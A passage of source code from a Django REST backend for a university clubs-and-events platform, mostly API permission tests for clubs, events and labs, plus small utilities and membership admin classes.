response = self.client.post('/api/category/event-type/', {
'title_th': 'ไม่ได้ตั้งชื่อ',
'title_en': 'Unnamed'
})
self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
def test_update_event_type(self):
''' Test update event type '''
response = self.client.put('/api/category/event-type/{}/'.format(self.academic.id), {
'title_th': 'ไม่ได้ตั้งชื่อ',
'title_en': 'Unnamed'
})
self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
response = self.client.patch('/api/category/event-type/{}/'.format(self.academic.id), {
'title_th': 'ไม่ได้ตั้งชื่อ',
'title_en': 'Unnamed'
})
self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
def test_delete_event_type(self):
''' Test delete event type '''
response = self.client.delete('/api/category/event-type/{}/'.format(self.academic.id))
self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
class EventSeriesAPITest(APITestCase):
''' Event series API test '''
def setUp(self):
''' Set up '''
self.to_be_it = EventSeries.objects.create(title_th='ทูบีไอที ติวน้องสอบตรงไอทีลาดกระบัง', title_en='ToBeIT@KMITL')
self.oph = EventSeries.objects.create(title_th='เปิดบ้านไอทีลาดกระบัง', title_en='ITLadkrabang OpenHouse')
self.pre_pro = EventSeries.objects.create(title_th='พรีโปรแกรมมิ่ง', title_en='Pre-Programming')
def test_list_event_series(self):
''' Test list event series '''
response = self.client.get('/api/category/event-series/')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(response.data), 3)
def test_retrieve_event_series(self):
''' Test retrieve event series '''
response = self.client.get('/api/category/event-series/{}/'.format(self.to_be_it.id))
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertIn('title_th', response.data.keys())
self.assertIn('title_en', response.data.keys())
def test_create_event_series(self):
''' Test create event series '''
response = self.client.post('/api/category/event-series/', {
'title_th': 'ไม่ได้ตั้งชื่อ',
'title_en': 'Unnamed'
})
self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
def test_update_event_series(self):
''' Test update event series '''
response = self.client.put('/api/category/event-series/{}/'.format(self.to_be_it.id), {
'title_th': 'ไม่ได้ตั้งชื่อ',
'title_en': 'Unnamed'
})
self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
response = self.client.patch('/api/category/event-series/{}/'.format(self.to_be_it.id), {
'title_th': 'ไม่ได้ตั้งชื่อ',
'title_en': 'Unnamed'
})
self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
def test_delete_event_series(self):
''' Test delete event series '''
response = self.client.delete('/api/category/event-series/{}/'.format(self.to_be_it.id))
self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
```
#### File: clubs-and-events-backend/community/tests.py
```python
from django.contrib.auth import get_user_model
from rest_framework import status
from rest_framework.test import APITestCase
from community.models import Community, Club, Event, CommunityEvent, Lab
from core.utils.general import get_random_string
from membership.models import Membership
import datetime
class CommunityAPITest(APITestCase):
''' Community API test '''
def setUp(self):
''' Set up '''
self.user_01 = get_user_model().objects.create_user(username='user_01', password='<PASSWORD>', name='User One')
self.user_02 = get_user_model().objects.create_user(username='user_02', password='<PASSWORD>', name='User Two')
self.user_03 = get_user_model().objects.create_user(username='user_03', password='<PASSWORD>', name='User Three')
self.user_04 = get_user_model().objects.create_user(username='user_04', password='<PASSWORD>', name='User Four')
self.user_05 = get_user_model().objects.create_user(username='user_05', password='<PASSWORD>', name='User Five')
self.lecturer_01 = get_user_model().objects.create_user(
username='lecturer_01', password='<PASSWORD>', name='Prof.Lazy Bones', user_group='lecturer'
)
self.lecturer_02 = get_user_model().objects.create_user(
username='lecturer_02', password='<PASSWORD>', name='Prof.Lazy Ass', user_group='lecturer'
)
self.support_staff = get_user_model().objects.create_user(
username='support', password='<PASSWORD>', name='Mr.Supporter', user_group='support'
)
self.club_public = Club.objects.create(
name_th='ชุมนุมทดสอบสังคม สาธารณะ', name_en='Community Testing Club (Public)',
is_publicly_visible=True, is_official=True, valid_through=datetime.date(2099, 7, 31)
)
self.club_private = Club.objects.create(
name_th='ชุมนุมทดสอบสังคม ส่วนตัว', name_en='Community Testing Club (Private)',
is_publicly_visible=False, is_official=False
)
self.event = Event.objects.create(
name_th='กิจกรรมทดสอบสังคม',
            name_en='Community Testing Event',
is_approved=True,
location='L207 IT KMITL',
start_date=datetime.date(2020, 12, 1),
end_date=datetime.date(2020, 12, 2),
start_time=datetime.time(9, 0, 0),
end_time=datetime.time(17, 0, 0),
is_publicly_visible=False
)
self.event_unapproved = Event.objects.create(
name_th='กิจกรรมทดสอบสังคม (ยังไม่ได้รับการอนุมัติ)',
            name_en='Community Testing Event (Unapproved)',
is_approved=False,
location='L207 IT KMITL',
start_date=datetime.date(2020, 12, 1),
end_date=datetime.date(2020, 12, 2),
start_time=datetime.time(9, 0, 0),
end_time=datetime.time(17, 0, 0),
is_publicly_visible=False
)
self.lab = Lab.objects.create(name_th='ห้องปฏิบัติการทดสอบสังคม', name_en='Community Testing Lab')
self.community_event = CommunityEvent.objects.create(
name_th='กิจกรรมชุมนุมทดสอบสังคม',
name_en='Community Testing Club Event',
is_approved=True,
location='L207 IT KMITL',
start_date=datetime.date(2020, 12, 1),
end_date=datetime.date(2020, 12, 2),
start_time=datetime.time(9, 0, 0),
end_time=datetime.time(17, 0, 0),
created_under_id=self.club_public.id,
is_publicly_visible=False
)
Membership.objects.create(community_id=self.club_public.id, user_id=self.user_01.id, position=3)
Membership.objects.create(community_id=self.club_public.id, user_id=self.user_02.id, position=2)
Membership.objects.create(community_id=self.club_public.id, user_id=self.user_03.id, position=1)
Membership.objects.create(community_id=self.club_public.id, user_id=self.user_04.id, position=0)
Membership.objects.create(community_id=self.club_private.id, user_id=self.user_01.id, position=3)
Membership.objects.create(community_id=self.club_private.id, user_id=self.user_02.id, position=2)
Membership.objects.create(community_id=self.club_private.id, user_id=self.user_03.id, position=1)
Membership.objects.create(community_id=self.club_private.id, user_id=self.user_04.id, position=0)
Membership.objects.create(community_id=self.event.id, user_id=self.user_01.id, position=3)
Membership.objects.create(community_id=self.event.id, user_id=self.user_02.id, position=2)
Membership.objects.create(community_id=self.event.id, user_id=self.user_03.id, position=1)
Membership.objects.create(community_id=self.event.id, user_id=self.user_04.id, position=0)
Membership.objects.create(community_id=self.event_unapproved.id, user_id=self.user_01.id, position=3)
Membership.objects.create(community_id=self.event_unapproved.id, user_id=self.user_02.id, position=2)
Membership.objects.create(community_id=self.event_unapproved.id, user_id=self.user_03.id, position=1)
Membership.objects.create(community_id=self.event_unapproved.id, user_id=self.user_04.id, position=0)
Membership.objects.create(community_id=self.community_event.id, user_id=self.user_01.id, position=3)
Membership.objects.create(community_id=self.community_event.id, user_id=self.user_02.id, position=2)
Membership.objects.create(community_id=self.community_event.id, user_id=self.user_03.id, position=1)
Membership.objects.create(community_id=self.community_event.id, user_id=self.user_04.id, position=0)
Membership.objects.create(community_id=self.lab.id, user_id=self.lecturer_01.id, position=3)
Membership.objects.create(community_id=self.lab.id, user_id=self.lecturer_02.id, position=2)
Membership.objects.create(community_id=self.lab.id, user_id=self.user_03.id, position=1)
Membership.objects.create(community_id=self.lab.id, user_id=self.user_04.id, position=0)
def test_list_community_authenticated(self):
''' Test list community authenticated '''
self.client.login(username='user_05', password='<PASSWORD>')
self._test_list_community(instance_path='club', expected_length=2)
self._test_list_community(instance_path='event', expected_length=3)
self._test_list_community(instance_path='event/community', expected_length=1)
self._test_list_community(instance_path='lab', expected_length=1)
self.client.logout()
def test_list_community_unauthenticated(self):
''' Test list community unauthenticated '''
self._test_list_community(instance_path='club', expected_length=1)
self._test_list_community(instance_path='event', expected_length=0)
self._test_list_community(instance_path='event/community', expected_length=0)
self._test_list_community(instance_path='lab', expected_length=0)
def _test_list_community(self, instance_path='club', expected_length=0):
''' Test list community '''
response = self.client.get('/api/community/{}/'.format(instance_path))
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(response.data), expected_length)
def test_retrieve_community_authenticated(self):
''' Test retrieve community authenticated '''
self.client.login(username='user_05', password='<PASSWORD>')
self._test_retrieve_community(instance_path='club', instance_id=self.club_public.id, allows_retrieve=True)
self._test_retrieve_community(instance_path='club', instance_id=self.club_private.id, allows_retrieve=True)
self._test_retrieve_community(instance_path='event', instance_id=self.event.id, allows_retrieve=True)
self._test_retrieve_community(
instance_path='event/community', instance_id=self.community_event.id, allows_retrieve=True
)
self._test_retrieve_community(instance_path='lab', instance_id=self.lab.id, allows_retrieve=True)
self.client.logout()
def test_retrieve_community_unauthenticated(self):
''' Test retrieve community unauthenticated '''
self._test_retrieve_community(instance_path='club', instance_id=self.club_public.id, allows_retrieve=True)
self._test_retrieve_community(instance_path='club', instance_id=self.club_private.id, allows_retrieve=False)
self._test_retrieve_community(instance_path='event', instance_id=self.event.id, allows_retrieve=False)
self._test_retrieve_community(
instance_path='event/community', instance_id=self.community_event.id, allows_retrieve=False
)
self._test_retrieve_community(instance_path='lab', instance_id=self.lab.id, allows_retrieve=False)
def _test_retrieve_community(self, instance_path='club', instance_id=0, allows_retrieve=False):
''' Test retrieve community '''
response = self.client.get('/api/community/{}/{}/'.format(instance_path, instance_id))
if allows_retrieve:
self.assertEqual(response.status_code, status.HTTP_200_OK)
else:
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_retrieve_community_event_under_non_publicly_visible_community(self):
''' Test retrieve community event under non-publicly visible community '''
club = Club.objects.create(
name_th='ชุมนุมนอน', name_en='Sleeping Club', is_publicly_visible=False, is_official=True
)
community_event = CommunityEvent.objects.create(
name_th='นิทรรศการเตียงนอน',
name_en='Bed Fair',
is_approved=True,
location='Somewhere undecided',
start_date=datetime.date(2020, 12, 1),
end_date=datetime.date(2020, 12, 2),
start_time=datetime.time(9, 0, 0),
end_time=datetime.time(17, 0, 0),
created_under_id=club.id,
is_publicly_visible=True
)
# Unauthenticated
response = self.client.get('/api/community/club/{}/'.format(club.id))
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
response = self.client.get('/api/community/event/community/{}/'.format(community_event.id))
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
# Authenticated
self.client.login(username='user_05', password='<PASSWORD>')
response = self.client.get('/api/community/club/{}/'.format(club.id))
self.assertEqual(response.status_code, status.HTTP_200_OK)
response = self.client.get('/api/community/event/community/{}/'.format(community_event.id))
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.client.logout()
def test_create_club(self):
''' Test create club '''
self._test_create_community(username='user_05', instance_path='club', allows_create=True)
self._test_create_community(username='lecturer_02', instance_path='club', allows_create=False)
self._test_create_community(username='support', instance_path='club', allows_create=False)
self._test_create_community(username=str(), instance_path='club', allows_create=False)
def test_create_event(self):
''' Test create event '''
self._test_create_community(username='user_05', instance_path='event', allows_create=True)
self._test_create_community(username='lecturer_01', instance_path='event', allows_create=True)
self._test_create_community(username='support', instance_path='event', allows_create=True)
self._test_create_community(username=str(), instance_path='event', allows_create=False)
def test_create_community_event_under_official_club(self):
''' Test create community event under official club '''
self._test_create_community(
username='user_01', instance_path='event/community', created_under=self.club_public.id, allows_create=True
)
self._test_create_community(
username='user_02', instance_path='event/community', created_under=self.club_public.id, allows_create=True
)
self._test_create_community(
username='user_03', instance_path='event/community', created_under=self.club_public.id, allows_create=True
)
self._test_create_community(
username='user_04', instance_path='event/community', created_under=self.club_public.id, allows_create=False
)
self._test_create_community(
username='user_05', instance_path='event/community', created_under=self.club_public.id, allows_create=False
)
self._test_create_community(
username=str(), instance_path='event/community', created_under=self.club_public.id, allows_create=False
)
def test_create_community_event_under_unofficial_club(self):
''' Test create community event under unofficial club '''
self._test_create_community(
username='user_01', instance_path='event/community', created_under=self.club_private.id, allows_create=False
)
self._test_create_community(
username='user_02', instance_path='event/community', created_under=self.club_private.id, allows_create=False
)
self._test_create_community(
username='user_03', instance_path='event/community', created_under=self.club_private.id, allows_create=False
)
self._test_create_community(
username='user_04', instance_path='event/community', created_under=self.club_private.id, allows_create=False
)
self._test_create_community(
username='user_05', instance_path='event/community', created_under=self.club_private.id, allows_create=False
)
self._test_create_community(
username=str(), instance_path='event/community', created_under=self.club_private.id, allows_create=False
)
def test_create_community_event_under_event(self):
''' Test create community event under event '''
self._test_create_community(
username='user_01', instance_path='event/community', created_under=self.event.id, allows_create=False
)
self._test_create_community(
username='user_02', instance_path='event/community', created_under=self.event.id, allows_create=False
)
self._test_create_community(
username='user_03', instance_path='event/community', created_under=self.event.id, allows_create=False
)
self._test_create_community(
username='user_04', instance_path='event/community', created_under=self.event.id, allows_create=False
)
self._test_create_community(
username='user_05', instance_path='event/community', created_under=self.event.id, allows_create=False
)
self._test_create_community(
username=str(), instance_path='event/community', created_under=self.event.id, allows_create=False
)
def test_create_community_event_under_community_event(self):
        ''' Test create community event under community event '''
self._test_create_community(
username='user_01', instance_path='event/community',
created_under=self.community_event.id, allows_create=False
)
self._test_create_community(
username='user_02', instance_path='event/community',
created_under=self.community_event.id, allows_create=False
)
self._test_create_community(
username='user_03', instance_path='event/community',
created_under=self.community_event.id, allows_create=False
)
self._test_create_community(
username='user_04', instance_path='event/community',
created_under=self.community_event.id, allows_create=False
)
self._test_create_community(
username='user_05', instance_path='event/community',
created_under=self.community_event.id, allows_create=False
)
self._test_create_community(
username=str(), instance_path='event/community',
created_under=self.community_event.id, allows_create=False
)
def test_create_community_event_under_lab(self):
        ''' Test create community event under lab '''
self._test_create_community(
username='lecturer_01', instance_path='event/community', created_under=self.lab.id, allows_create=True
)
self._test_create_community(
username='lecturer_02', instance_path='event/community', created_under=self.lab.id, allows_create=True
)
self._test_create_community(
username='user_03', instance_path='event/community', created_under=self.lab.id, allows_create=True
)
self._test_create_community(
username='user_04', instance_path='event/community', created_under=self.lab.id, allows_create=False
)
self._test_create_community(
username='user_05', instance_path='event/community', created_under=self.lab.id, allows_create=False
)
self._test_create_community(
username=str(), instance_path='event/community', created_under=self.lab.id, allows_create=False
)
def test_create_lab(self):
''' Test create lab '''
self._test_create_community(username='user_05', instance_path='lab', allows_create=False)
self._test_create_community(username='lecturer_01', instance_path='lab', allows_create=True)
self._test_create_community(username='support', instance_path='lab', allows_create=False)
self._test_create_community(username=str(), instance_path='lab', allows_create=False)
def _test_create_community(self, username=str(), instance_path='club', created_under=int(), allows_create=True):
''' Test create community '''
if username.strip() != str():
self.client.login(username=username, password='<PASSWORD>')
response = self.client.post('/api/community/{}/'.format(instance_path), {
'name_th': 'สังคมใหม่ โดย {}'.format(username),
'name_en': 'New Community by {}'.format(username),
'location': '-',
'start_date': '2021-01-01',
'end_date': '2021-01-02',
'start_time': '08:15:00',
'end_time': '15:45:00',
'created_under': created_under
})
if allows_create:
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(
len(Membership.objects.filter(
user_id=get_user_model().objects.get(username=username),
community_id=response.data['id'],
position=3,
status='A'
)), 1
)
else:
self.assertIn(response.status_code, (status.HTTP_400_BAD_REQUEST, status.HTTP_403_FORBIDDEN))
if username.strip() != str():
self.client.logout()
def test_update_club(self):
''' Test update club '''
self._test_update_community(
username='user_01', community_id=self.club_public.id, instance_path='club', allows_update=True
)
self._test_update_community(
username='user_02', community_id=self.club_public.id, instance_path='club', allows_update=True
)
self._test_update_community(
username='user_03', community_id=self.club_public.id, instance_path='club', allows_update=False
)
self._test_update_community(
username='user_04', community_id=self.club_public.id, instance_path='club', allows_update=False
)
self._test_update_community(
username='user_05', community_id=self.club_public.id, instance_path='club', allows_update=False
)
self._test_update_community(
username=str(), community_id=self.club_public.id, instance_path='club', allows_update=False
)
def test_update_event(self):
        ''' Test update event '''
self._test_update_community(
username='user_01', community_id=self.event.id, instance_path='event', allows_update=True
)
self._test_update_community(
username='user_02', community_id=self.event.id, instance_path='event', allows_update=True
)
self._test_update_community(
username='user_03', community_id=self.event.id, instance_path='event', allows_update=False
)
self._test_update_community(
username='user_04', community_id=self.event.id, instance_path='event', allows_update=False
)
self._test_update_community(
username='user_05', community_id=self.event.id, instance_path='event', allows_update=False
)
self._test_update_community(
username=str(), community_id=self.event.id, instance_path='event', allows_update=False
)
def test_update_community_event(self):
''' Test update community event '''
self._test_update_community(
username='user_01', community_id=self.community_event.id,
instance_path='event/community', allows_update=True
)
self._test_update_community(
username='user_02', community_id=self.community_event.id,
instance_path='event/community', allows_update=True
)
self._test_update_community(
username='user_03', community_id=self.community_event.id,
instance_path='event/community', allows_update=False
)
self._test_update_community(
username='user_04', community_id=self.community_event.id,
instance_path='event/community', allows_update=False
)
self._test_update_community(
username='user_05', community_id=self.community_event.id,
instance_path='event/community', allows_update=False
)
self._test_update_community(
username=str(), community_id=self.community_event.id,
instance_path='event/community', allows_update=False
)
def test_update_lab(self):
''' Test update lab '''
self._test_update_community(
username='lecturer_01', community_id=self.lab.id, instance_path='lab', allows_update=True
)
self._test_update_community(
username='lecturer_02', community_id=self.lab.id, instance_path='lab', allows_update=True
)
self._test_update_community(
username='user_03', community_id=self.lab.id, instance_path='lab', allows_update=False
)
self._test_update_community(
username='user_04', community_id=self.lab.id, instance_path='lab', allows_update=False
)
self._test_update_community(
username='user_05', community_id=self.lab.id, instance_path='lab', allows_update=False
)
self._test_update_community(
username=str(), community_id=self.lab.id, instance_path='lab', allows_update=False
)
def _test_update_community(self, username=str(), community_id=int(), instance_path='club', allows_update=True):
''' Test update community '''
if username.strip() != str():
self.client.login(username=username, password='<PASSWORD>')
description = get_random_string(length=64)
response = self.client.patch('/api/community/{}/{}/'.format(instance_path, community_id), {
'description': description
})
if allows_update:
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(Community.objects.get(pk=community_id).description, description)
else:
self.assertIn(response.status_code, (status.HTTP_400_BAD_REQUEST, status.HTTP_403_FORBIDDEN))
if username.strip() != str():
self.client.logout()
def test_delete_community_as_leader(self):
''' Test delete community as leader '''
self._test_delete_community(
username='user_01', community_id=self.community_event.id,
instance_path='event/community', allows_delete=True
)
self._test_delete_community(
username='user_01', community_id=self.club_public.id,
instance_path='club', allows_delete=True
)
self._test_delete_community(
username='user_01', community_id=self.club_private.id,
instance_path='club', allows_delete=True
)
self._test_delete_community(
username='user_01', community_id=self.event.id,
instance_path='event', allows_delete=True
)
self._test_delete_community(
username='user_01', community_id=self.event_unapproved.id,
instance_path='event', allows_delete=True
)
self._test_delete_community(
username='lecturer_01', community_id=self.lab.id,
instance_path='lab', allows_delete=True
)
def test_delete_community_as_deputy_leader(self):
''' Test delete community as deputy leader '''
self._test_delete_community(
username='user_02', community_id=self.community_event.id,
instance_path='event/community', allows_delete=False
)
self._test_delete_community(
username='user_02', community_id=self.club_public.id,
instance_path='club', allows_delete=False
)
self._test_delete_community(
username='user_02', community_id=self.club_private.id,
instance_path='club', allows_delete=False
)
self._test_delete_community(
username='user_02', community_id=self.event.id,
instance_path='event', allows_delete=False
)
self._test_delete_community(
username='user_02', community_id=self.event_unapproved.id,
instance_path='event', allows_delete=False
)
self._test_delete_community(
username='lecturer_02', community_id=self.lab.id,
instance_path='lab', allows_delete=False
)
def test_delete_community_as_staff(self):
''' Test delete community as staff '''
self._test_delete_community(
username='user_03', community_id=self.community_event.id,
instance_path='event/community', allows_delete=False
)
self._test_delete_community(
username='user_03', community_id=self.club_public.id,
instance_path='club', allows_delete=False
)
self._test_delete_community(
username='user_03', community_id=self.club_private.id,
instance_path='club', allows_delete=False
)
self._test_delete_community(
username='user_03', community_id=self.event.id,
instance_path='event', allows_delete=False
)
self._test_delete_community(
username='user_03', community_id=self.event_unapproved.id,
instance_path='event', allows_delete=False
)
self._test_delete_community(
username='user_03', community_id=self.lab.id,
instance_path='lab', allows_delete=False
)
def test_delete_community_as_member(self):
''' Test delete community as member '''
self._test_delete_community(
username='user_04', community_id=self.community_event.id,
instance_path='event/community', allows_delete=False
)
self._test_delete_community(
username='user_04', community_id=self.club_public.id,
instance_path='club', allows_delete=False
)
self._test_delete_community(
username='user_04', community_id=self.club_private.id,
instance_path='club', allows_delete=False
)
self._test_delete_community(
username='user_04', community_id=self.event.id,
instance_path='event', allows_delete=False
)
self._test_delete_community(
username='user_04', community_id=self.event_unapproved.id,
instance_path='event', allows_delete=False
)
self._test_delete_community(
username='user_04', community_id=self.lab.id,
instance_path='lab', allows_delete=False
)
def test_delete_community_as_non_member(self):
''' Test delete community as non-member '''
self._test_delete_community(
username='user_05', community_id=self.community_event.id,
instance_path='event/community', allows_delete=False
)
self._test_delete_community(
username='user_05', community_id=self.club_public.id,
instance_path='club', allows_delete=False
)
self._test_delete_community(
username='user_05', community_id=self.club_private.id,
instance_path='club', allows_delete=False
)
self._test_delete_community(
username='user_05', community_id=self.event.id,
instance_path='event', allows_delete=False
)
self._test_delete_community(
username='user_05', community_id=self.event_unapproved.id,
instance_path='event', allows_delete=False
)
self._test_delete_community(
username='user_05', community_id=self.lab.id,
instance_path='lab', allows_delete=False
)
def test_delete_community_unauthenticated(self):
''' Test delete community while unauthenticated '''
self._test_delete_community(
username=str(), community_id=self.community_event.id, instance_path='event/community', allows_delete=False
)
self._test_delete_community(
username=str(), community_id=self.club_public.id, instance_path='club', allows_delete=False
)
self._test_delete_community(
username=str(), community_id=self.club_private.id, instance_path='club', allows_delete=False
)
self._test_delete_community(
username=str(), community_id=self.event.id, instance_path='event', allows_delete=False
)
self._test_delete_community(
username=str(), community_id=self.event_unapproved.id, instance_path='event', allows_delete=False
)
self._test_delete_community(
username=str(), community_id=self.lab.id, instance_path='lab', allows_delete=False
)
def test_delete_club_then_community_event(self):
''' Test delete club then community event '''
self._test_delete_community(
username='user_01', community_id=self.club_public.id,
instance_path='club', allows_delete=True
)
self._test_delete_community(
username='user_01', community_id=self.community_event.id,
instance_path='event/community', allows_delete=False
)
def _test_delete_community(self, username=str(), community_id=int(), instance_path='club', allows_delete=True):
''' Test delete community '''
if username.strip() != str():
self.client.login(username=username, password='<PASSWORD>')
response = self.client.delete('/api/community/{}/{}/'.format(instance_path, community_id))
if allows_delete:
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
else:
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
if username.strip() != str():
self.client.logout()
```
#### File: clubs-and-events-backend/core/tests.py
```python
from django.test import TestCase
from core.utils.files import simplify_file_size
class FilesUtilityTest(TestCase):
''' Utility test '''
def test_simplify_file_size(self):
''' Test simplify file size function '''
self.assertEqual(simplify_file_size(7, unit='b'), '7 bits')
self.assertEqual(simplify_file_size(8, unit='b'), '1 bytes')
self.assertEqual(simplify_file_size(9, unit='b'), '1 bytes')
self.assertEqual(simplify_file_size(8191, unit='b'), '1023 bytes')
self.assertEqual(simplify_file_size(8192, unit='b'), '1.00 kB')
self.assertEqual(simplify_file_size(8193, unit='b'), '1.00 kB')
self.assertEqual(simplify_file_size(8388607, unit='b'), '1023.99 kB')
self.assertEqual(simplify_file_size(8388608, unit='b'), '1.00 MB')
self.assertEqual(simplify_file_size(8388609, unit='b'), '1.00 MB')
self.assertEqual(simplify_file_size(1023, unit='B'), '1023 bytes')
self.assertEqual(simplify_file_size(1024, unit='B'), '1.00 kB')
self.assertEqual(simplify_file_size(1025, unit='B'), '1.00 kB')
self.assertEqual(simplify_file_size(1048575, unit='B'), '1023.99 kB')
self.assertEqual(simplify_file_size(1048576, unit='B'), '1.00 MB')
self.assertEqual(simplify_file_size(1048577, unit='B'), '1.00 MB')
self.assertEqual(simplify_file_size(1073741823, unit='B'), '1023.99 MB')
self.assertEqual(simplify_file_size(1073741824, unit='B'), '1.00 GB')
self.assertEqual(simplify_file_size(1073741825, unit='B'), '1.00 GB')
self.assertEqual(simplify_file_size(1023, unit='kB'), '1023.00 kB')
self.assertEqual(simplify_file_size(1024, unit='kB'), '1.00 MB')
self.assertEqual(simplify_file_size(1025, unit='kB'), '1.00 MB')
self.assertEqual(simplify_file_size(1048575, unit='kB'), '1023.99 MB')
self.assertEqual(simplify_file_size(1048576, unit='kB'), '1.00 GB')
self.assertEqual(simplify_file_size(1048577, unit='kB'), '1.00 GB')
self.assertEqual(simplify_file_size(1073741823, unit='kB'), '1023.99 GB')
self.assertEqual(simplify_file_size(1073741824, unit='kB'), '1.00 TB')
self.assertEqual(simplify_file_size(1073741825, unit='kB'), '1.00 TB')
```
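The repository's actual `simplify_file_size` implementation in `core/utils/files.py` is not included in this excerpt; the sketch below is one hypothetical implementation that satisfies the assertions above (bits are floored into bytes, bytes are printed as integers, larger units are truncated rather than rounded to two decimals):

```python
def simplify_file_size(size, unit='B'):
    ''' Hypothetical sketch, not the repository's implementation '''
    units = ('B', 'kB', 'MB', 'GB', 'TB')
    if unit == 'b':
        if size < 8:
            return '{} bits'.format(size)
        size, unit = size // 8, 'B'
    if unit not in units:
        raise ValueError('Unsupported unit: {}'.format(unit))
    index = units.index(unit)
    while size >= 1024 and index < len(units) - 1:
        size /= 1024
        index += 1
    if index == 0:
        return '{} bytes'.format(int(size))
    truncated = int(size * 100) / 100    # truncate, e.g. 1023.999 -> 1023.99
    return '{:.2f} {}'.format(truncated, units[index])
```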
#### File: core/utils/users.py
```python
from crum import get_current_request
from clubs_and_events.settings import EMAIL_DOMAIN_NAME
from user.permissions import IsStudentObject
def get_email(user):
''' Retrieves default IT KMITL email '''
if IsStudentObject().has_object_permission(get_current_request(), None, user) and user.username[0:2] == 'it':
return user.username[2:] + '@' + EMAIL_DOMAIN_NAME
return user.username + '@' + EMAIL_DOMAIN_NAME
def get_client_ip(request):
''' Retrieves client's IP address '''
if request is None:
return None
x_forwarded_for = request.META.get('HTTP_X_FORWARDED_FOR')
if x_forwarded_for is not None:
ip = x_forwarded_for.split(',')[0]
else:
ip = request.META.get('REMOTE_ADDR')
return ip
```
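A short usage illustration for the helpers above (illustrative only; it assumes Django settings are already configured, e.g. inside a test case):

```python
from django.test import RequestFactory

from core.utils.users import get_client_ip

factory = RequestFactory()

# Behind a proxy, the first address in X-Forwarded-For wins.
request = factory.get('/', HTTP_X_FORWARDED_FOR='203.0.113.7, 10.0.0.1')
assert get_client_ip(request) == '203.0.113.7'

# Without the header, REMOTE_ADDR is used (RequestFactory defaults to 127.0.0.1).
assert get_client_ip(factory.get('/')) == '127.0.0.1'
```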
#### File: clubs-and-events-backend/membership/admin.py
```python
from django.contrib import admin
from community.models import Club, Event, Lab, CommunityEvent
from core.utils.files import get_file_size
from core.utils.general import truncate, has_instance
from membership.models import Request, Invitation, Advisory, Membership, CustomMembershipLabel, MembershipLog
from membership.models import ApprovalRequest
import datetime
class RequestAdmin(admin.ModelAdmin):
''' Request admin '''
list_display = ('id', 'user', 'community', 'status', 'created_at', 'updated_at', 'updated_by')
readonly_fields = ('updated_by',)
list_per_page = 20
def get_readonly_fields(self, request, obj=None):
''' Get read-only fields '''
if obj is not None:
if obj.status != 'W':
return ('user', 'community', 'status') + self.readonly_fields
return ('user', 'community') + self.readonly_fields
return self.readonly_fields
class InvitationAdmin(admin.ModelAdmin):
''' Invitation admin '''
list_display = ('id', 'community', 'invitor', 'invitee', 'status', 'created_at', 'updated_at')
list_per_page = 20
def get_readonly_fields(self, request, obj=None):
''' Get read-only fields '''
if obj is not None:
if obj.status != 'W':
return ('community', 'invitor', 'invitee', 'status') + self.readonly_fields
return ('community', 'invitor', 'invitee') + self.readonly_fields
return self.readonly_fields
class AdvisoryAdmin(admin.ModelAdmin):
''' Advisory admin '''
list_display = ('id', 'advisor', 'community', 'start_date', 'end_date', 'is_active', 'created_at', 'created_by',
'updated_at', 'updated_by')
readonly_fields = ('created_by', 'updated_by')
list_per_page = 20
def get_readonly_fields(self, request, obj=None):
''' Get read-only fields '''
if obj is not None:
return ('advisor', 'community') + self.readonly_fields
return self.readonly_fields
def is_active(self, obj):
''' Get active status '''
return obj.start_date <= datetime.datetime.now().date() <= obj.end_date
is_active.boolean = True
class CustomMembershipLabelInline(admin.StackedInline):
''' Custom membership label inline '''
model = CustomMembershipLabel
readonly_fields = ('created_by', 'updated_by')
class MembershipLogInline(admin.TabularInline):
''' Membership log inline '''
model = MembershipLog
readonly_fields = ('position', 'status', 'start_datetime', 'created_by', 'updated_by')
exclude = ('end_datetime',)
def has_add_permission(self, request, obj):
''' Restricts add permission '''
return False
def has_change_permission(self, request, obj=None):
''' Restricts change permission '''
return False
def has_delete_permission(self, request, obj=None):
''' Restricts delete permission '''
return False
class MembershipAdmin(admin.ModelAdmin):
''' Membership admin '''
list_display = ('id', 'user', 'community', 'position', 'position_name', 'is_active', 'status', 'custom_label',
'created_at', 'created_by', 'updated_at', 'updated_by')
readonly_fields = ('created_by', 'updated_by',)
inlines = (CustomMembershipLabelInline, MembershipLogInline)
list_per_page = 20
def get_readonly_fields(self, request, obj=None):
''' Get read-only fields '''
if obj is not None:
return ('user', 'community') + self.readonly_fields
return self.readonly_fields
def position_name(self, obj):
''' Get position name '''
try:
if has_instance(obj.community, Club):
return ('Member', 'Staff', 'Vice-President', 'President')[obj.position]
elif has_instance(obj.community, Event) and not has_instance(obj.community, CommunityEvent):
return ('Participator', 'Staff', 'Event Co-Creator', 'Event Creator')[obj.position]
elif has_instance(obj.community, CommunityEvent):
return ('Participator', 'Staff', 'Vice-President', 'President')[obj.position]
elif has_instance(obj.community, Lab):
return ('Lab Member', 'Lab Helper', 'Lab Co-Supervisor', 'Lab Supervisor')[obj.position]
return None
except IndexError:
return None
def is_active(self, obj):
''' Get active status '''
return obj.status == 'A'
is_active.boolean = True
    def custom_label(self, obj):
        ''' Get custom label, or None if the membership has no custom label '''
        try:
            return CustomMembershipLabel.objects.get(membership_id=obj.id).label
        except CustomMembershipLabel.DoesNotExist:
            return None
class MembershipLogAdmin(admin.ModelAdmin):
''' Membership log admin '''
